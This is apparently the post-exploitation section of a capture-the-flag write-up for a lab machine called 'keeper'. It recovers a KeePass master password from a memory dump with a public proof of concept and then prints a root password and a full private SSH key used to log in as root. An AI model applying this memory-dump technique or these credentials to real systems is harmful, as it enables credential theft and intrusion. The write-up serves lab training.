b) Post Exploitation

At this stage, we already have access to the exploited machine and ensure that we still have access to it even if modifications and changes are made. During this phase, we may try to escalate our privileges to obtain the highest possible rights and hunt for sensitive data such as credentials or other data concerned with protecting (pillaging). Often times we perform post-exploitation as an input to the lateral movement process described next.

Unzipping file to reveal contents

lnorgaard@keeper:~$ unzip RT30000.zip
Archive:  RT30000.zip
  inflating: KeePassDumpFull.dmp     
 extracting: passcodes.kdbx

Discovered hash with keepass2john

$keepass$*2*60000*0*5d7b4747e5a278d572fb0a66fe187ae5d74a0e2f56a2aaaf4c4f2b8ca342597d*5b7ec1cf6889266a388abe398d7990a294bf2a581156f7a7452b4074479bdea7*08500fa5a52622ab89b0addfedd5a05c*411593ef0846fc1bb3db4f9bab515b42e58ade0c25096d15f090b0fe10161125*a4842b416f14723513c5fb704a2f49024a70818e786f07e68e82a6d3d7cdbcdc

Hash led nowhere with bruteforce

Found POC for dumping keepass and extracting

https://github.com/matro7sh/keepass-dump-masterkey

python3 Downloads/poc.py Downloads/KeePassDumpFull.dmp                
2024-02-21 21:39:20,860 [.] [main] Opened Downloads/KeePassDumpFull.dmp

Possible password: ●,dgr●d med fl●de
Possible password: ●ldgr●d med fl●de
Possible password: ●`dgr●d med fl●de
Possible password: ●-dgr●d med fl●de
Possible password: ●'dgr●d med fl●de
Possible password: ●]dgr●d med fl●de
Possible password: ●Adgr●d med fl●de
Possible password: ●Idgr●d med fl●de
Possible password: ●:dgr●d med fl●de
Possible password: ●=dgr●d med fl●de
Possible password: ●_dgr●d med fl●de
Possible password: ●cdgr●d med fl●de
Possible password: ●Mdgr●d med fl●de

Searching with googler for the possible passphrase

●Mdgr●d med fl●de

googler
Please initiate a query.
googler (? for help) ●Mdgr●d med fl●de

 1.  Danish Red Berry Pudding (Rødgrød Med Fløde) Recipe
     https://www.thespruceeats.com/rodgrod-med-flode-danish-red-berry-pudding-2952748

 2.  Rødgrød med Fløde (Danish Red Berry Pudding with Cream)
     https://www.saveur.com/article/recipes/rodgrod-med-flode-danish-red-berry-pudding-with-cream/

 3.  Rødgrød med Fløde Is the Tongue-Twisting Dessert That ...
     https://www.yahoo.com/lifestyle/r-dgr-d-med-fl-144259547.html

Log in to .kdbx using passphrase: "rødgrød med fløde"

With KeePassXC locate: Network > keeper.htb

Root credentials and RSA Key

root:F4><3K0nd!

PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
Private-Lines: 14
AAABAQCB0dgBvETt8/UFNdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6j
oDni1wZdo7hTpJ5ZjdmzwxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCih
kmyZTZOV9eq1D6P1uB6AXSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputY
f7n24kvL0WlBQThsiLkKcz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzT
VkCew1DZuYnYOGQxHYW6WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivz
UXjcCAviPpmSXB19UG8JlTpgORyhAAAAgQD2kfhSA+/ASrc04ZIVagCge1Qq8iWs
OxG8eoCMW8DhhbvL6YKAfEvj3xeahXexlVwUOcDXO7Ti0QSV2sUw7E71cvl/ExGz
in6qyp3R4yAaV7PiMtLTgBkqs4AA3rcJZpJb01AZB8TBK91QIZGOswi3/uYrIZ1r
SsGN1FbK/meH9QAAAIEArbz8aWansqPtE+6Ye8Nq3G2R1PYhp5yXpxiE89L87NIV
09ygQ7Aec+C24TOykiwyPaOBlmMe+Nyaxss/gc7o9TnHNPFJ5iRyiXagT4E2WEEa
xHhv1PDdSrE8tB9V8ox1kxBrxAvYIZgceHRFrwPrF823PeNWLC2BNwEId0G76VkA
AACAVWJoksugJOovtA27Bamd7NRPvIa4dsMaQeXckVh19/TF8oZMDuJoiGyq6faD
AF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGy
NNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is=
Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0

Convert PuTTY Key File to OpenSSH

puttygen rsakey -O private-openssh -o rsakey_openssh

└─$ ssh [email protected] -i rsakey_openssh 
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

You have new mail.
Last login: Tue Aug  8 19:00:06 2023 from 10.10.14.41

Exploit root.txt

root@keeper:~# id
uid=0(root) gid=0(root) groups=0(root)
root@keeper:~# cat /root/root.txt
6-------------------------------f6

Previousa) Exploitation Nextc) Lateral Movement

Last updated 1 year ago

hashtagUnzipping file to reveal contents

hashtagDiscovered hash with keepass2john

hashtagHash led nowhere with bruteforce

hashtagFound POC for dumping keepass and extracting

hashtagSearching with googler for the possible passphrase

hashtagLog in to .kdbx using passphrase: "rødgrød med fløde"

hashtagWith KeePassXC locate: Network > keeper.htb

hashtagRoot credentials and RSA Key

hashtagConvert PuTTY Key File to OpenSSH

hashtagLogin via SSH using root credentials and OpenSSH RSA Key

hashtagExploit root.txt